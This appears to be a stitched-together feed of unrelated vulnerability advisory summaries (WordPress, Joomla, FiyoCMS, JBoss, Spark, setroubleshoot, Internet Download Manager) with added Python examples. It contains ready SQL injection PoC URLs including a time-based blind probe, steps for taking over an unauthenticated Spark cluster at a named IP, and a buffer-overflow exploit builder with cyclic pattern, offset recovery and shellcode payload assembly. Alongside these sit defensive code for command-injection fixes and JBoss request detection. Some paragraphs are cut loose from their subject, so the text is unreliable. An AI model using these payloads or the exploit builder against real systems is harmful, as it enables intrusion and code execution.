Several security issues have been identified in the latest FiyoCMS release: multiple SQL injection and cross-site scripting (XSS) vulnerabilities, as well as a direct URL access bypass. The SQL injection flaws are triggered by sending a crafted request to the vulnerable parameters; the XSS flaws by sending a crafted request whose payload contains script that the application echoes back unsanitized; and the direct URL access bypass by requesting a protected resource directly, skipping the application's own access checks.
The plugin does not validate that the 'pid' parameter is an integer, so unauthorized users can attack websites that use it. The vulnerable code is in the thumbnails() function in [ /wp-content/plugins/sp-client-document-manager/ajax.php ], where the 'pid' variable is used without sanitization. PoC: /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi] Example (time-based blind probe: the response is delayed by five seconds only if the first character of the database name is 'a', 0x61): /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. It can be used to test for the presence of the JMX Console and the Web Console, both of which are vulnerable to remote code execution when exposed.
setroubleshoot tries to find out which rpm a given file belongs to when it receives SELinux access violation (AVC) reports; the idea is presumably to give the admin a convenient report of which type enforcement rules need to be relaxed. setroubleshoot runs as root (although in its own domain, setroubleshootd_t). The vulnerable code is in util.py; the attached PoC uses NetworkManager's openvpn plugin to execute arbitrary commands by triggering an access violation on a pathname that contains shell commands. The setroubleshootd_t domain has quite a lot of allow rules and transitions, so this clearly counts as privilege escalation. Furthermore, many admins run their systems in permissive mode (full root, since SELinux then no longer confines the daemon) even when the distribution ships enforcing by default.
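The bug class here is shell command injection through a filename. The Python below is an added illustration, not setroubleshoot's own code: it assumes the owner lookup is done by shelling out to an rpm -qf style tool (the tool is a parameter, so the demo runs offline with printf in its place) and shows the vulnerable string-concatenation form beside two fixes, an argv list with no shell at all and shlex.quote() where a shell cannot be avoided. The malicious pathname is constructed and harmless.

```python
import shlex
import subprocess

# Constructed, harmless stand-in for an attacker-controlled pathname taken
# from an AVC report.  A real payload would run something other than echo.
EVIL_PATH = "/tmp/x; echo INJECTED"

def owner_lookup_unsafe(path, tool="rpm -qf"):
    """Vulnerable pattern: the untrusted path is concatenated into a command
    string and handed to /bin/sh.  Anything the shell treats as syntax in the
    filename (';', '|', '$(...)', backticks) executes with the caller's
    privileges, which for a root daemon such as setroubleshootd means root."""
    cmd = tool + " " + path
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout

def owner_lookup_safe(path, tool=("rpm", "-qf")):
    """Hardened form: an argv list and no shell.  The path reaches the tool
    as exactly one argument regardless of the characters it contains."""
    proc = subprocess.run([*tool, path], capture_output=True, text=True)
    return proc.stdout

def owner_lookup_quoted(path, tool="rpm -qf"):
    """If a shell really is required, shlex.quote() wraps the path so the
    shell parses it as a single word."""
    cmd = tool + " " + shlex.quote(path)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout

def injected(output):
    """True if the echo smuggled in EVIL_PATH actually ran, i.e. a separate
    command was executed (it appears as its own output line)."""
    return "INJECTED" in output.splitlines()

if __name__ == "__main__":
    # printf stands in for rpm so the demo needs no RPM-based system.
    print("unsafe :", repr(owner_lookup_unsafe(EVIL_PATH, tool="printf '%s\\n'")))
    print("safe   :", repr(owner_lookup_safe(EVIL_PATH, tool=("printf", "%s\n"))))
    print("quoted :", repr(owner_lookup_quoted(EVIL_PATH, tool="printf '%s\\n'")))
```

The argv form is the right default: it removes the shell from the picture entirely, whereas quoting only works if every interpolated value is quoted every time.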
Spark clusters that are not protected by a proper firewall can be taken over easily, since the standalone master accepts job submissions without authentication by default; this exploit simply runs arbitrary code on the cluster. All you have to do is find a vulnerable Spark cluster (the master usually listens on port 7077), add the host to your hosts file so your system can resolve it (here spark-b-akhil-master pointing to 54.155.61.87 in my /etc/hosts), and submit a Spark job containing the arbitrary code you want executed.
Contact Form Maker v1.0.1 (Joomla component com_contactformmaker) suffers from an SQL injection vulnerability in the 'id' parameter. Proof of concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL_INJECTION_HERE
The 'theme_id' parameter (GET) and the 'image_id' parameter (POST) are vulnerable to SQL injection. An attacker can inject SQL through either parameter to query the database and extract sensitive information.
WordPress Slider Revolution Responsive <= 4.1.4 suffers from an arbitrary file download vulnerability. By sending a crafted request to the vulnerable plugin, an attacker can download any file on the server that the web server process can read, such as the WordPress configuration file, which holds the database credentials.
This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). Whenever the JMX Invoker is exposed with its default configuration, a malicious serialized 'MarshalledInvocation' Java object sent to it allows an attacker to execute arbitrary code. The exploit works even if the Web Console and the JMX Console are protected or disabled, because it targets the invoker directly.
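Both the JexBoss entry above and this one come down to whether JBoss's management endpoints are reachable from untrusted networks. The Python below is an added detection example, not JexBoss or the exploit code: it classifies raw HTTP requests, flagging those aimed at the console and invoker paths and recognising a Java serialization stream by its fixed header (0xAC 0xED 0x00 0x05) and the MarshalledInvocation class name embedded in it. The servlet paths are the JBoss defaults and are an assumption to confirm against the deployment under review; the sample requests are constructed and the serialized body is truncated.

```python
# Fixed header of every Java serialization stream: STREAM_MAGIC, STREAM_VERSION.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# Class whose deserialization the invoker exploit abuses.
INVOKER_CLASS = b"org.jboss.invocation.MarshalledInvocation"
# Assumed JBoss default context paths; verify against the actual deployment.
SENSITIVE_PATHS = ("/invoker/", "/jmx-console/", "/web-console/")

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, body).  Deliberately
    minimal: enough for a proxy tap or captured requests, not a full parser."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    method, path, _version = request_line.split(b" ", 2)
    return method.decode("ascii"), path.decode("ascii"), body

def classify(raw):
    """Return the list of indicators found in one raw request."""
    _method, path, body = parse_request(raw)
    findings = []
    if path.startswith(SENSITIVE_PATHS):
        findings.append("jboss-management-path")
    if body.startswith(JAVA_SERIAL_MAGIC):
        findings.append("java-serialized-body")
    if INVOKER_CLASS in body:
        findings.append("marshalled-invocation")
    return findings

def severity(findings):
    """A serialized object posted to a management path from an untrusted
    source is treated as an attack attempt; a hit on the path alone is
    exposure worth reviewing."""
    if "java-serialized-body" in findings and "jboss-management-path" in findings:
        return "high"
    if findings:
        return "medium"
    return "none"

# Constructed samples.  The serialized body is a truncated stream whose first
# object descriptor names MarshalledInvocation (TC_OBJECT 0x73, TC_CLASSDESC
# 0x72, then the 2-byte UTF length 0x0029 = 41 characters of class name).
SAMPLE_INVOKER = (
    b"POST /invoker/JMXInvokerServlet HTTP/1.1\r\n"
    b"Host: jboss.example.test\r\n"
    b"Content-Type: application/x-java-serialized-object\r\n"
    b"\r\n"
    + JAVA_SERIAL_MAGIC + b"\x73\x72\x00\x29" + INVOKER_CLASS + b"..."
)
SAMPLE_CONSOLE = (
    b"GET /jmx-console/HtmlAdaptor?action=inspectMBean HTTP/1.1\r\n"
    b"Host: jboss.example.test\r\n\r\n"
)
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: jboss.example.test\r\n\r\n"

if __name__ == "__main__":
    for raw in (SAMPLE_INVOKER, SAMPLE_CONSOLE, SAMPLE_BENIGN):
        found = classify(raw)
        print(parse_request(raw)[1], severity(found), found)
```

Legitimate remote clients also post serialized objects to the invoker, so this classifier identifies exposure to untrusted sources rather than proving exploitation; the durable fix is to restrict or remove the invoker and console applications, not to filter on the payload.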
IDM v6.20 Local Buffer Overflow is a local exploit that allows an attacker to execute arbitrary code on vulnerable installations of Internet Download Manager. The vulnerability is a boundary error in the processing of the username field when configuring a VPN/Dial-Up connection: a specially crafted overlong string entered into that field overwrites the EIP register, giving the attacker control of the flow of execution and hence arbitrary code execution.
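Finding where the overflowing string lands in EIP is the first step in turning a bug like this into a working exploit. The Python below is an added example and not the advisory's exploit code: it generates a Metasploit-style cyclic pattern to paste into the username field, recovers the offset from the EIP value read in the debugger, and assembles a payload at that offset. No IDM offsets or addresses are claimed; the return address and shellcode in the demo are constructed placeholders, and the bad-character check is included because a text field will typically truncate on NUL and may mangle other bytes.

```python
import itertools
import string
import struct

def cyclic_pattern(length):
    """Metasploit-style pattern: every Upper-lower-digit triplet is unique,
    so any 4 consecutive bytes pin down a single offset.  Maximum 20280."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern is unique only up to 20280 bytes")
    buf = bytearray()
    for up, low, dig in itertools.product(string.ascii_uppercase,
                                          string.ascii_lowercase, string.digits):
        buf += (up + low + dig).encode("ascii")
        if len(buf) >= length:
            break
    return bytes(buf[:length])

def pattern_offset(pattern, eip):
    """Offset of the 4 bytes that landed in EIP.  `eip` is the register value
    as displayed by the debugger (e.g. 0x41346241); on x86 it was stored
    little-endian, so it is repacked that way before searching.  -1 if absent."""
    return pattern.find(struct.pack("<I", eip))

def bad_chars(data, banned=(0x00, 0x0a, 0x0d)):
    """Bytes in `data` the input field is assumed to truncate or mangle.  The
    default set (NUL, LF, CR) is a constructed assumption for a text field;
    confirm the real set by sending all 256 values and inspecting memory."""
    return sorted({b for b in data if b in banned})

def build_payload(offset, ret_addr, shellcode, total_len, nop_sled=16):
    """Filler up to the EIP slot, the overwrite, a NOP sled, then shellcode,
    padded to the crash length so the stack layout matches the one observed."""
    payload = (b"A" * offset + struct.pack("<I", ret_addr)
               + b"\x90" * nop_sled + shellcode)
    if len(payload) > total_len:
        raise ValueError("payload longer than the buffer that was overflowed")
    return payload.ljust(total_len, b"C")

if __name__ == "__main__":
    # Constructed walk-through: a 5000-byte pattern is entered in the field,
    # the debugger reports EIP; here we pretend the overwrite sat at 1234.
    pat = cyclic_pattern(5000)
    eip_seen = struct.unpack("<I", pat[1234:1238])[0]
    off = pattern_offset(pat, eip_seen)
    print(f"EIP=0x{eip_seen:08x} -> offset {off}")
    # Placeholders, not real IDM addresses or a real payload.
    demo = build_payload(off, 0x41414141, b"\xcc" * 4, 5000)
    print(len(demo), bad_chars(demo))
```

In practice the return address is chosen from a non-ASLR module loaded by the target (a jmp esp or equivalent), and the shellcode is encoded to avoid whatever bad_chars() reports for the field.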